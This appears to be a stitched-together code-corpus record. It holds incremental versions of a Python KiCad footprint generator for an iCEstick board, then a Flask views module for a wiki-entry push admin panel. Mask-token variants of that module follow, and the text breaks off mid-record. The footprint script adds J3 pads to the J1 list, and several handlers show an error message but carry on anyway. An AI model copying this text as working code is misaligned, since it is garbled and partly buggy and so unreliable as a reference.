"step-4": "x = 0.0\ny = 0.0\ndrillDiameter = 1.0\npadWidth = 1.6\nfrom os.path import exists\nfrom pad import *\nfilename = 'iCEstick.kicad_mod'\nheader = ''\nfooter = ''\nif exists(filename):\n f = open(filename)\n footprint = f.read()\n f.close()\n headerEndIndex = footprint.find('(pad ')\n header = footprint[:headerEndIndex]\n lastPadIndex = headerEndIndex\n while footprint.find('(pad ', lastPadIndex) > -1:\n lastPadIndex = footprint.find('(pad ', lastPadIndex) + 5\n footerStartIndex = footprint.find('))', lastPadIndex) + 2\n footer = footprint[footerStartIndex:]\nif header.find('TE-Connectivity') < 0:\n header = \"\"\"(module iCEstick (layer F.Cu) (tedit 5BD73D6F)\n (fp_text reference REF** (at 0 -12.7) (layer F.SilkS)\n (effects (font (size 1 1) (thickness 0.15)))\n )\n (fp_text value iCEstick (at 0 25.4) (layer F.Fab)\n (effects (font (size 1 1) (thickness 0.15)))\n )\n\"\"\"\n footer = ')'\ndesignators_j1 = ['3V3', 'GND'] + [str(n) for n in range(112, 120)]\ndesignators_j2 = [[str(n) for n in range(78, 82)] + ['GND', '3V3'], ['87',\n '88', '90', '91', 'GND', '3V3']]\ndesignators_j3 = ['3V3', 'GND', '62', '61', '60', '56', '48', '47', '45', '44']\npads_j1 = []\noldX = x\noldY = y\ny -= 21.81\nfor i in range(10):\n if i == 0:\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n newPad = Pad(designator=designators_j1[i], through_hole=True, plated=\n True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=\n drillDiameter)\n pads_j1 += [newPad]\n x -= 2.54\npads_j2 = []\nx = oldX - 5.8\nnewY = oldY - 21.81 + 4.49 + 5 * 2.54\ny = newY\nfor i in range(6):\n if i == 0:\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n newPad = Pad(designator=designators_j2[0][i], through_hole=True, plated\n =True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=\n drillDiameter)\n pads_j2 += [newPad]\n y -= 2.54\nx -= 2.54\ny = newY\nfor i in range(6):\n newPad = Pad(designator=designators_j2[1][i], through_hole=True, plated\n =True, shape=Shape.CIRCLE, at=(x, y), size=(padWidth, padWidth),\n drill=drillDiameter)\n pads_j2 += [newPad]\n y -= 2.54\npads_j3 = []\nx = oldX\ny = oldY\nfor i in range(10):\n if i == 0:\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n newPad = Pad(designator=designators_j3[i], through_hole=True, plated=\n True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=\n drillDiameter)\n pads_j1 += [newPad]\n x -= 2.54\npads = pads_j1 + pads_j2 + pads_j3\nnewFootprint = header\nfor pad in pads:\n newFootprint += str(pad) + '\\n'\nnewFootprint += footer.strip()\nprint(newFootprint)\nf = open(filename, 'w')\nf.write(newFootprint)\nf.close()\n",
"step-5": "#!/usr/bin/python\n\n# Point of origin (connector J3, pad 1, net 3V3)\nx = 0.0\ny = 0.0\n\ndrillDiameter = 1.0\npadWidth = 1.6\n\n\nfrom os.path import exists\nfrom pad import *\n\nfilename=\"iCEstick.kicad_mod\"\n\nheader = \"\"\nfooter = \"\"\n\nif exists(filename):\n # Read existing footprint\n f = open(filename)\n footprint = f.read()\n f.close()\n \n # Find the end of the header\n headerEndIndex = footprint.find(\"(pad \")\n header = footprint[:headerEndIndex]\n \n # Find the end of the pads list\n lastPadIndex = headerEndIndex\n while (footprint.find(\"(pad \", lastPadIndex) > -1):\n lastPadIndex = footprint.find(\"(pad \", lastPadIndex) + 5\n \n footerStartIndex = footprint.find(\"))\", lastPadIndex) + 2\n footer = footprint[footerStartIndex:]\n\nif header.find(\"TE-Connectivity\") < 0:\n header = \\\n\"\"\"(module iCEstick (layer F.Cu) (tedit 5BD73D6F)\n (fp_text reference REF** (at 0 -12.7) (layer F.SilkS)\n (effects (font (size 1 1) (thickness 0.15)))\n )\n (fp_text value iCEstick (at 0 25.4) (layer F.Fab)\n (effects (font (size 1 1) (thickness 0.15)))\n )\n\"\"\"\n footer = \")\"\n\n#\n# Generate pads according to schematic drawing\n#\n\ndesignators_j1 = [\"3V3\", \"GND\"] + [str(n) for n in range(112,120)]\n\ndesignators_j2 = [ \\\n [str(n) for n in range(78,82)] + [\"GND\", \"3V3\"], \\\n [\"87\", \"88\", \"90\", \"91\", \"GND\", \"3V3\"] \\\n ]\n\ndesignators_j3 = [\"3V3\", \"GND\", \"62\", \"61\", \"60\", \"56\", \"48\", \"47\", \"45\", \"44\"]\n\n#\n# J1 connector pad list\n#\npads_j1 = []\noldX = x\noldY = y\ny -= 21.81\nfor i in range(10):\n # The first pad is a rectangle, the remaining ones are circular\n if (i == 0):\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n \n # Create pad object\n newPad = Pad(\n designator = designators_j1[i],\n through_hole = True,\n plated = True,\n shape = shape,\n at = (x, y),\n size = (padWidth, padWidth),\n drill = drillDiameter\n )\n pads_j1 += [newPad]\n x -= 2.54\n\n#\n# J2 connector pad list\n#\npads_j2 = []\nx = oldX - 5.80\nnewY = oldY - 21.81 + 4.49 + 5*2.54\ny = newY\nfor i in range(6):\n # The first pad is a rectangle, the remaining ones are circular\n if (i == 0):\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n \n # Create pad object\n newPad = Pad(\n designator = designators_j2[0][i],\n through_hole = True,\n plated = True,\n shape = shape,\n at = (x, y),\n size = (padWidth, padWidth),\n drill = drillDiameter\n )\n pads_j2 += [newPad]\n y -= 2.54\n\n# Second (inner) row of pins of J2\nx -= 2.54\ny = newY\nfor i in range(6):\n # Create pad object\n newPad = Pad(\n designator = designators_j2[1][i],\n through_hole = True,\n plated = True,\n shape = Shape.CIRCLE,\n at = (x, y),\n size = (padWidth, padWidth),\n drill = drillDiameter\n )\n pads_j2 += [newPad]\n y -= 2.54\n\n#\n# J3 connector pad list\n#\npads_j3 = []\nx = oldX\ny = oldY\nfor i in range(10):\n # The first pad is a rectangle, the remaining ones are circular\n if (i == 0):\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n \n # Create pad object\n newPad = Pad(\n designator = designators_j3[i],\n through_hole = True,\n plated = True,\n shape = shape,\n at = (x, y),\n size = (padWidth, padWidth),\n drill = drillDiameter\n )\n pads_j1 += [newPad]\n x -= 2.54\n\n# Make a list of all pads\npads = pads_j1 + pads_j2 + pads_j3\n\n# Compose new footprint from header, pads and footer\nnewFootprint = header\nfor pad in pads:\n newFootprint += str(pad) + \"\\n\"\nnewFootprint += footer.strip()\n\n# Print generated footprint to screen\nprint(newFootprint)\n\n# Save generated footprint to file\nf = open(filename, \"w\")\nf.write(newFootprint)\nf.close()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
import urllib
from urllib2 import HTTPError
from datetime import datetime
from flask.views import MethodView
from flask.ext.login import current_user, login_required
from flask.ext.paginate import Pagination as PaginationBar
from flask import render_template, redirect, url_for, request, jsonify, flash, current_app, abort
from koushihime.auth.models import UserOperation, User, Role
from koushihime.auth.constants import Permission, Operation
from koushihime.utils import Pagination, admin_required, Env
from koushihime.utils.moegirl import MoegirlQuery, MoegirlImage
from . import main
from utils import recent_have_pushed, have_auto_catched
from models import WaitingQueue, BanList, RulePushCount
from forms import PushForm, AddUserForm, EditProfileForm, AdminEditProfileForm, BanKeywordForm, CookieForm
@main.before_request
def before_request():
if current_user.is_anonymous:
return redirect(url_for('auth.login'))
elif current_user.is_blocked:
return render_template('main/auth/block.html')
else:
current_user.last_seen = datetime.utcnow()
current_user.save()
class Index(MethodView):
def get(self):
if not current_user:
return redirect(url_for("auth.login"))
config = current_app.config["WEIBO_AUTH_CONFIG"]
callback = urllib.quote(config["CALLBACK"])
app_key = config["APP_KEY"]
return render_template('main/index.html', callback=callback, app_key=app_key)
class Update(MethodView):
decorators = [login_required]
def get(self, page):
per_page = 10
unpushed_entry = WaitingQueue.query.order_by(WaitingQueue.cutting_weight.desc()).all()
pagination = Pagination(unpushed_entry, per_page)
current_page = pagination.page(page)
foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',
show_single_page=True, page=page,
per_page=per_page, total=len(unpushed_entry),
format_total=True, format_number=True)
result = {
"titles": current_page,
"current_time": datetime.utcnow(),
"pushtime": 10,
"deltime": 999,
"page": page,
"per_page": per_page,
"pagination": foot_bar
}
return render_template('main/update.html', **result)
def post(self, page):
data = request.get_json()
if data['action'] == 'post':
title = data["title"]
env = Env()
current_weight = env.get("CUTTING_WEIGHT_INIT")
entry = WaitingQueue.query.filter_by(title=title).first()
if entry:
entry.cutting_weight = current_weight + 1 # FIXME: 即使条目处于权重最高状态亦可增加权限
entry.save()
env.set("CUTTING_WEIGHT_INIT", entry.cutting_weight)
elif data['action'] == 'del':
title = data['title']
UserOperation(user_id=current_user.id, operation=Operation.DELETE, title=title).save()
query = WaitingQueue.query.filter_by(title=data['title']).first()
if query:
query.delete()
response = jsonify({'result': True})
return response
class ManualUpdate(MethodView):
decorators = [login_required]
def __init__(self):
self.form = PushForm
def get(self):
return render_template('main/mupdate.html', form=self.form(), pushtime=10)
def post(self):
if not current_user.can(Permission.MANUAL_PUSH):
flash(u"你没有权限")
form = self.form(request.form)
if not form.validate():
flash(u"条目格式有问题,请检查并重新填写")
title = form.pushtitle.data
result = self.check_push_validate(title.encode("utf-8"))
if not result:
flash(u"推送条目被ban,或者已经在24小时之内推送过,或者已经进入待推送列表")
try:
image = MoegirlImage(title)
except HTTPError as e:
flash(u"请求萌百错误,错误码如下{},请联系管理员".format(e))
return redirect(url_for('main.mupdate'))
if not image.path:
flash(u"无法取得图片,请重试")
entry = WaitingQueue(title=title, image=image.path)
env = Env()
current_weight = env.get("CUTTING_WEIGHT_INIT")
entry.cutting_weight = current_weight + 1
entry.save()
env.set("CUTTING_WEIGHT_INIT", entry.cutting_weight)
UserOperation(user_id=current_user.id, title=title, operation=Operation.PUSH).save()
if form.industry.data:
try:
from koushihime.crontab import push
push()
except Exception as e:
flash(u"推送失败: {}".format(str(e)))
flash(u"操作成功,词条将立即推送")
return redirect(url_for('main.mupdate'))
@staticmethod
def check_push_validate(title):
moegirl_entry = MoegirlQuery(title)
namespace = moegirl_entry.get_namespace()
if namespace is 0:
baned_from_moegirl = moegirl_entry.banned_moegirl_category()
baned_from_regex = moegirl_entry.ban_from_regex()
has_pushed = recent_have_pushed(title.decode("utf-8")) # TODO: 改成自动冒泡
has_catched = have_auto_catched(title.decode("utf-8"))
result = baned_from_moegirl is False \
and has_pushed is False \
and has_catched is False \
and baned_from_regex is False
return result
else:
return False
class UserInfo(MethodView):
decorators = [login_required]
def get(self, username):
is_admin = current_user.can(Permission.ADMINISTER)
if current_user.username == username or is_admin is True:
user_info = User.query.filter_by(username=username, deleted=False).first()
if not user_info:
abort(404)
return render_template('main/user.html', u=user_info, username=user_info.username)
else:
abort(403)
class UserList(MethodView):
decorators = [login_required, admin_required]
def __init__(self):
self.form = AddUserForm
def get(self):
userlist = User.query.filter_by(deleted=False).all()
return render_template('main/userlist.html', userlist=userlist, form=self.form())
def post(self):
data = request.get_json()
if data:
if data['action'] == 'edit':
username = data['username']
else:
username = data['username']
try:
User.query.filter_by(username=username, deleted=False).first().delete()
except:
flash(u'用户不存在')
return jsonify({"status": 302, "location": url_for('main.editprofile', username=username)})
elif request.form:
self.add_user()
return redirect('userlist')
def add_user(self):
form = self.form(request.form)
if form.validate():
role = Role.query.filter_by(name=form.role.data).first()
if role:
if not User.query.filter_by(email=form.email.data).first():
user = User(email=form.email.data, username=form.username.data,
role=role, password=form.password.data)
user.save()
else:
flash(u'已经存在该用户')
else:
flash(u'不存在该用户组')
return redirect(url_for('main.userlist'))
class EditProfile(MethodView):
decorators = [login_required]
def __init__(self):
self.form = EditProfileForm
self.admin_form = AdminEditProfileForm
def get(self, username):
if not username: # 用户访问自己的个人信息编辑页
form = self.form()
form.email.data = current_user.email
form.about_me.data = current_user.aboutme
else:
if current_user.can(Permission.ADMINISTER):
user_info = User.query.filter_by(username=username, deleted=False).first()
if user_info:
form = self.admin_form()
form.email.data = user_info.email
form.about_me.data = user_info.aboutme
form.role.data = user_info.role.name
else:
flash(u'用户不存在')
return redirect(url_for('main.index'))
else:
abort(403)
return render_template('main/edit_profile.html', form=form, u=current_user)
def post(self, username):
if not username:
form = self.form(request.form)
user = current_user
else:
if current_user.can(Permission.ADMINISTER):
form = self.form(request.form)
user = User.query.filter_by(username=username, deleted=False).first()
if user:
if not current_user.verify_password(form.oripassword.data):
flash(u'管理员密码输入错误')
return redirect(url_for('main.editprofile', username=username))
else:
flash(u'用户不存在')
return redirect(url_for('main.index'))
else:
abort(403)
self.change_profile(user, form, True if username else False)
return redirect(url_for('main.user', username=username))
@staticmethod
def change_profile(user, form, admin=False):
user.password = form.password.data
user.email = form.email.data
user.aboutme = form.about_me.data
if admin:
new_role = Role.query.filter_by(name=form.role.data)
if new_role:
user.role = new_role
user.save()
class OperationLog(MethodView):
decorators = [login_required, admin_required]
def get(self, page):
per_page = 10
count = UserOperation.query.count()
query = UserOperation.query.order_by(UserOperation.id.desc())\
.paginate(page=page, per_page=per_page, error_out=False)
foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',
show_single_page=False, page=page, per_page=per_page,
total=count, format_total=True, format_number=True)
return render_template('main/log.html', records=query.items,
page=page, per_page=per_page, pagination=foot_bar, Operation=Operation)
class KeywordBan(MethodView):
decorators = [login_required, admin_required]
def __init__(self):
self.form = BanKeywordForm
def get(self, page):
per_page = 10
count = BanList.query.filter_by(deleted=False).count()
# TODO: 把关键词读入配置减少查询次数
pagination = BanList.query.filter_by(deleted=False)\
.paginate(page=page, per_page=per_page, error_out=False)
foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',
show_single_page=False, page=page, per_page=per_page,
total=count, format_total=True, format_number=True)
template_param = {
'keywords': pagination.items,
'page': page,
'per_page': per_page,
'pagination': foot_bar,
'form': self.form()
}
return render_template('main/ban.html', **template_param)
def post(self, page):
data = request.get_json()
if data:
keyword = data['keyword']
result = BanList.query.filter_by(rule=keyword).first()
if result:
if result.status:
result.status.delete()
result.delete()
flash(u'成功删除关键词')
else:
flash(u'该关键词不存在')
return jsonify({"status": 302, "location": url_for('main.ban')})
elif request.form:
form = self.form(request.form)
if form.validate():
exist = BanList.query.filter_by(rule=form.keyword.data).first()
if not exist:
ban = BanList(rule=form.keyword.data, time_limit=form.time_limit.data)
ban.save()
status = RulePushCount(rule_id=ban.id, count=ban.time_limit)
status.save()
flash(u'添加关键词成功')
else:
if exist.deleted is True:
exist.deleted = False
exist.time_limit = form.time_limit.data
exist.save()
status = RulePushCount(rule_id=exist.id, count=exist.time_limit)
status.save()
else:
flash(u'重复添加关键词')
return redirect(url_for('main.ban'))
# TODO: deprecated
class WeiboAuthCallback(MethodView):
decorators = [login_required, admin_required]
def get(self):
self.auth_code = request.args.get("code")
result = self.fresh_access()
if result is True:
return render_template('main/success.html')
else:
return render_template('main/failed.html', e=result)
def fresh_access(self):
# config = current_app.config["WEIBO_AUTH_CONFIG"]
# callback = config["CALLBACK"]
# app_key = config["APP_KEY"]
# app_secret_key = config["APP_SECRET"]
try:
pass
# client = APIClient(app_key=app_key, app_secret=app_secret_key, redirect_uri=callback)
# token_data = client.request_access_token(self.auth_code)
# access_token, expires_in = token_data.access_token, token_data.expires_in
except BaseException as e:
return e
# config["ACCESS_TOKEN"] = access_token
# config["EXPIRE_TIME"] = expires_in
# env = Env()
# env.set("ACCESS_TOKEN", access_token)
# env = Env()
# env.set("EXPIRE_TIME", expires_in)
return True
class Cookie(MethodView):
decorators = [login_required, admin_required]
def __init__(self):
self.form = CookieForm
def get(self):
return render_template('main/cookie.html', form=self.form(), pushtime=10)
def post(self):
form = self.form(request.form)
if not form.validate():
flash(u"表单不合法")
cookie = form.cookie.data
env = Env()
env.set("COOKIE", cookie)
flash(u"设置 Cookie 成功")
return redirect(url_for('main.cookie'))
|
normal
|
{
"blob_id": "1a561ca0268d084c8fdde5de65ce0c7e68154eec",
"index": 4993,
"step-1": "<mask token>\n\n\nclass OperationLog(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self, page):\n per_page = 10\n count = UserOperation.query.count()\n query = UserOperation.query.order_by(UserOperation.id.desc()).paginate(\n page=page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page, total=\n count, format_total=True, format_number=True)\n return render_template('main/log.html', records=query.items, page=\n page, per_page=per_page, pagination=foot_bar, Operation=Operation)\n\n\nclass KeywordBan(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = BanKeywordForm\n\n def get(self, page):\n per_page = 10\n count = BanList.query.filter_by(deleted=False).count()\n pagination = BanList.query.filter_by(deleted=False).paginate(page=\n page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page, total=\n count, format_total=True, format_number=True)\n template_param = {'keywords': pagination.items, 'page': page,\n 'per_page': per_page, 'pagination': foot_bar, 'form': self.form()}\n return render_template('main/ban.html', **template_param)\n\n def post(self, page):\n data = request.get_json()\n if data:\n keyword = data['keyword']\n result = BanList.query.filter_by(rule=keyword).first()\n if result:\n if result.status:\n result.status.delete()\n result.delete()\n flash(u'成功删除关键词')\n else:\n flash(u'该关键词不存在')\n return jsonify({'status': 302, 'location': url_for('main.ban')})\n elif request.form:\n form = self.form(request.form)\n if form.validate():\n exist = BanList.query.filter_by(rule=form.keyword.data).first()\n if not exist:\n ban = BanList(rule=form.keyword.data, time_limit=form.\n time_limit.data)\n ban.save()\n status = RulePushCount(rule_id=ban.id, count=ban.time_limit\n )\n status.save()\n flash(u'添加关键词成功')\n elif exist.deleted is True:\n exist.deleted = False\n exist.time_limit = form.time_limit.data\n exist.save()\n status = RulePushCount(rule_id=exist.id, count=exist.\n time_limit)\n status.save()\n else:\n flash(u'重复添加关键词')\n return redirect(url_for('main.ban'))\n\n\nclass WeiboAuthCallback(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self):\n self.auth_code = request.args.get('code')\n result = self.fresh_access()\n if result is True:\n return render_template('main/success.html')\n else:\n return render_template('main/failed.html', e=result)\n\n def fresh_access(self):\n try:\n pass\n except BaseException as e:\n return e\n return True\n\n\nclass Cookie(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = CookieForm\n\n def get(self):\n return render_template('main/cookie.html', form=self.form(),\n pushtime=10)\n\n def post(self):\n form = self.form(request.form)\n if not form.validate():\n flash(u'表单不合法')\n cookie = form.cookie.data\n env = Env()\n env.set('COOKIE', cookie)\n flash(u'设置 Cookie 成功')\n return redirect(url_for('main.cookie'))\n",
"step-2": "<mask token>\n\n\nclass UserList(MethodView):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass EditProfile(MethodView):\n decorators = [login_required]\n\n def __init__(self):\n self.form = EditProfileForm\n self.admin_form = AdminEditProfileForm\n\n def get(self, username):\n if not username:\n form = self.form()\n form.email.data = current_user.email\n form.about_me.data = current_user.aboutme\n elif current_user.can(Permission.ADMINISTER):\n user_info = User.query.filter_by(username=username, deleted=False\n ).first()\n if user_info:\n form = self.admin_form()\n form.email.data = user_info.email\n form.about_me.data = user_info.aboutme\n form.role.data = user_info.role.name\n else:\n flash(u'用户不存在')\n return redirect(url_for('main.index'))\n else:\n abort(403)\n return render_template('main/edit_profile.html', form=form, u=\n current_user)\n\n def post(self, username):\n if not username:\n form = self.form(request.form)\n user = current_user\n elif current_user.can(Permission.ADMINISTER):\n form = self.form(request.form)\n user = User.query.filter_by(username=username, deleted=False\n ).first()\n if user:\n if not current_user.verify_password(form.oripassword.data):\n flash(u'管理员密码输入错误')\n return redirect(url_for('main.editprofile', username=\n username))\n else:\n flash(u'用户不存在')\n return redirect(url_for('main.index'))\n else:\n abort(403)\n self.change_profile(user, form, True if username else False)\n return redirect(url_for('main.user', username=username))\n\n @staticmethod\n def change_profile(user, form, admin=False):\n user.password = form.password.data\n user.email = form.email.data\n user.aboutme = form.about_me.data\n if admin:\n new_role = Role.query.filter_by(name=form.role.data)\n if new_role:\n user.role = new_role\n user.save()\n\n\nclass OperationLog(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self, page):\n per_page = 10\n count = UserOperation.query.count()\n query = UserOperation.query.order_by(UserOperation.id.desc()).paginate(\n page=page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page, total=\n count, format_total=True, format_number=True)\n return render_template('main/log.html', records=query.items, page=\n page, per_page=per_page, pagination=foot_bar, Operation=Operation)\n\n\nclass KeywordBan(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = BanKeywordForm\n\n def get(self, page):\n per_page = 10\n count = BanList.query.filter_by(deleted=False).count()\n pagination = BanList.query.filter_by(deleted=False).paginate(page=\n page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page, total=\n count, format_total=True, format_number=True)\n template_param = {'keywords': pagination.items, 'page': page,\n 'per_page': per_page, 'pagination': foot_bar, 'form': self.form()}\n return render_template('main/ban.html', **template_param)\n\n def post(self, page):\n data = request.get_json()\n if data:\n keyword = data['keyword']\n result = BanList.query.filter_by(rule=keyword).first()\n if result:\n if result.status:\n result.status.delete()\n result.delete()\n flash(u'成功删除关键词')\n else:\n flash(u'该关键词不存在')\n return jsonify({'status': 302, 'location': url_for('main.ban')})\n elif request.form:\n form = self.form(request.form)\n if form.validate():\n exist = BanList.query.filter_by(rule=form.keyword.data).first()\n if not exist:\n ban = BanList(rule=form.keyword.data, time_limit=form.\n time_limit.data)\n ban.save()\n status = RulePushCount(rule_id=ban.id, count=ban.time_limit\n )\n status.save()\n flash(u'添加关键词成功')\n elif exist.deleted is True:\n exist.deleted = False\n exist.time_limit = form.time_limit.data\n exist.save()\n status = RulePushCount(rule_id=exist.id, count=exist.\n time_limit)\n status.save()\n else:\n flash(u'重复添加关键词')\n return redirect(url_for('main.ban'))\n\n\nclass WeiboAuthCallback(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self):\n self.auth_code = request.args.get('code')\n result = self.fresh_access()\n if result is True:\n return render_template('main/success.html')\n else:\n return render_template('main/failed.html', e=result)\n\n def fresh_access(self):\n try:\n pass\n except BaseException as e:\n return e\n return True\n\n\nclass Cookie(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = CookieForm\n\n def get(self):\n return render_template('main/cookie.html', form=self.form(),\n pushtime=10)\n\n def post(self):\n form = self.form(request.form)\n if not form.validate():\n flash(u'表单不合法')\n cookie = form.cookie.data\n env = Env()\n env.set('COOKIE', cookie)\n flash(u'设置 Cookie 成功')\n return redirect(url_for('main.cookie'))\n",
"step-3": "<mask token>\n\n\nclass UserList(MethodView):\n <mask token>\n\n def __init__(self):\n self.form = AddUserForm\n <mask token>\n\n def post(self):\n data = request.get_json()\n if data:\n if data['action'] == 'edit':\n username = data['username']\n else:\n username = data['username']\n try:\n User.query.filter_by(username=username, deleted=False\n ).first().delete()\n except:\n flash(u'用户不存在')\n return jsonify({'status': 302, 'location': url_for(\n 'main.editprofile', username=username)})\n elif request.form:\n self.add_user()\n return redirect('userlist')\n\n def add_user(self):\n form = self.form(request.form)\n if form.validate():\n role = Role.query.filter_by(name=form.role.data).first()\n if role:\n if not User.query.filter_by(email=form.email.data).first():\n user = User(email=form.email.data, username=form.\n username.data, role=role, password=form.password.data)\n user.save()\n else:\n flash(u'已经存在该用户')\n else:\n flash(u'不存在该用户组')\n return redirect(url_for('main.userlist'))\n\n\nclass EditProfile(MethodView):\n decorators = [login_required]\n\n def __init__(self):\n self.form = EditProfileForm\n self.admin_form = AdminEditProfileForm\n\n def get(self, username):\n if not username:\n form = self.form()\n form.email.data = current_user.email\n form.about_me.data = current_user.aboutme\n elif current_user.can(Permission.ADMINISTER):\n user_info = User.query.filter_by(username=username, deleted=False\n ).first()\n if user_info:\n form = self.admin_form()\n form.email.data = user_info.email\n form.about_me.data = user_info.aboutme\n form.role.data = user_info.role.name\n else:\n flash(u'用户不存在')\n return redirect(url_for('main.index'))\n else:\n abort(403)\n return render_template('main/edit_profile.html', form=form, u=\n current_user)\n\n def post(self, username):\n if not username:\n form = self.form(request.form)\n user = current_user\n elif current_user.can(Permission.ADMINISTER):\n form = self.form(request.form)\n user = User.query.filter_by(username=username, deleted=False\n ).first()\n if user:\n if not current_user.verify_password(form.oripassword.data):\n flash(u'管理员密码输入错误')\n return redirect(url_for('main.editprofile', username=\n username))\n else:\n flash(u'用户不存在')\n return redirect(url_for('main.index'))\n else:\n abort(403)\n self.change_profile(user, form, True if username else False)\n return redirect(url_for('main.user', username=username))\n\n @staticmethod\n def change_profile(user, form, admin=False):\n user.password = form.password.data\n user.email = form.email.data\n user.aboutme = form.about_me.data\n if admin:\n new_role = Role.query.filter_by(name=form.role.data)\n if new_role:\n user.role = new_role\n user.save()\n\n\nclass OperationLog(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self, page):\n per_page = 10\n count = UserOperation.query.count()\n query = UserOperation.query.order_by(UserOperation.id.desc()).paginate(\n page=page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page, total=\n count, format_total=True, format_number=True)\n return render_template('main/log.html', records=query.items, page=\n page, per_page=per_page, pagination=foot_bar, Operation=Operation)\n\n\nclass KeywordBan(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = BanKeywordForm\n\n def get(self, page):\n per_page = 10\n count = BanList.query.filter_by(deleted=False).count()\n pagination = BanList.query.filter_by(deleted=False).paginate(page=\n page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page, total=\n count, format_total=True, format_number=True)\n template_param = {'keywords': pagination.items, 'page': page,\n 'per_page': per_page, 'pagination': foot_bar, 'form': self.form()}\n return render_template('main/ban.html', **template_param)\n\n def post(self, page):\n data = request.get_json()\n if data:\n keyword = data['keyword']\n result = BanList.query.filter_by(rule=keyword).first()\n if result:\n if result.status:\n result.status.delete()\n result.delete()\n flash(u'成功删除关键词')\n else:\n flash(u'该关键词不存在')\n return jsonify({'status': 302, 'location': url_for('main.ban')})\n elif request.form:\n form = self.form(request.form)\n if form.validate():\n exist = BanList.query.filter_by(rule=form.keyword.data).first()\n if not exist:\n ban = BanList(rule=form.keyword.data, time_limit=form.\n time_limit.data)\n ban.save()\n status = RulePushCount(rule_id=ban.id, count=ban.time_limit\n )\n status.save()\n flash(u'添加关键词成功')\n elif exist.deleted is True:\n exist.deleted = False\n exist.time_limit = form.time_limit.data\n exist.save()\n status = RulePushCount(rule_id=exist.id, count=exist.\n time_limit)\n status.save()\n else:\n flash(u'重复添加关键词')\n return redirect(url_for('main.ban'))\n\n\nclass WeiboAuthCallback(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self):\n self.auth_code = request.args.get('code')\n result = self.fresh_access()\n if result is True:\n return render_template('main/success.html')\n else:\n return render_template('main/failed.html', e=result)\n\n def fresh_access(self):\n try:\n pass\n except BaseException as e:\n return e\n return True\n\n\nclass Cookie(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = CookieForm\n\n def get(self):\n return render_template('main/cookie.html', form=self.form(),\n pushtime=10)\n\n def post(self):\n form = self.form(request.form)\n if not form.validate():\n flash(u'表单不合法')\n cookie = form.cookie.data\n env = Env()\n env.set('COOKIE', cookie)\n flash(u'设置 Cookie 成功')\n return redirect(url_for('main.cookie'))\n",
"step-4": "<mask token>\n\n\nclass ManualUpdate(MethodView):\n <mask token>\n\n def __init__(self):\n self.form = PushForm\n\n def get(self):\n return render_template('main/mupdate.html', form=self.form(),\n pushtime=10)\n\n def post(self):\n if not current_user.can(Permission.MANUAL_PUSH):\n flash(u'你没有权限')\n form = self.form(request.form)\n if not form.validate():\n flash(u'条目格式有问题,请检查并重新填写')\n title = form.pushtitle.data\n result = self.check_push_validate(title.encode('utf-8'))\n if not result:\n flash(u'推送条目被ban,或者已经在24小时之内推送过,或者已经进入待推送列表')\n try:\n image = MoegirlImage(title)\n except HTTPError as e:\n flash(u'请求萌百错误,错误码如下{},请联系管理员'.format(e))\n return redirect(url_for('main.mupdate'))\n if not image.path:\n flash(u'无法取得图片,请重试')\n entry = WaitingQueue(title=title, image=image.path)\n env = Env()\n current_weight = env.get('CUTTING_WEIGHT_INIT')\n entry.cutting_weight = current_weight + 1\n entry.save()\n env.set('CUTTING_WEIGHT_INIT', entry.cutting_weight)\n UserOperation(user_id=current_user.id, title=title, operation=\n Operation.PUSH).save()\n if form.industry.data:\n try:\n from koushihime.crontab import push\n push()\n except Exception as e:\n flash(u'推送失败: {}'.format(str(e)))\n flash(u'操作成功,词条将立即推送')\n return redirect(url_for('main.mupdate'))\n\n @staticmethod\n def check_push_validate(title):\n moegirl_entry = MoegirlQuery(title)\n namespace = moegirl_entry.get_namespace()\n if namespace is 0:\n baned_from_moegirl = moegirl_entry.banned_moegirl_category()\n baned_from_regex = moegirl_entry.ban_from_regex()\n has_pushed = recent_have_pushed(title.decode('utf-8'))\n has_catched = have_auto_catched(title.decode('utf-8'))\n result = (baned_from_moegirl is False and has_pushed is False and\n has_catched is False and baned_from_regex is False)\n return result\n else:\n return False\n\n\nclass UserInfo(MethodView):\n decorators = [login_required]\n\n def get(self, username):\n is_admin = current_user.can(Permission.ADMINISTER)\n if 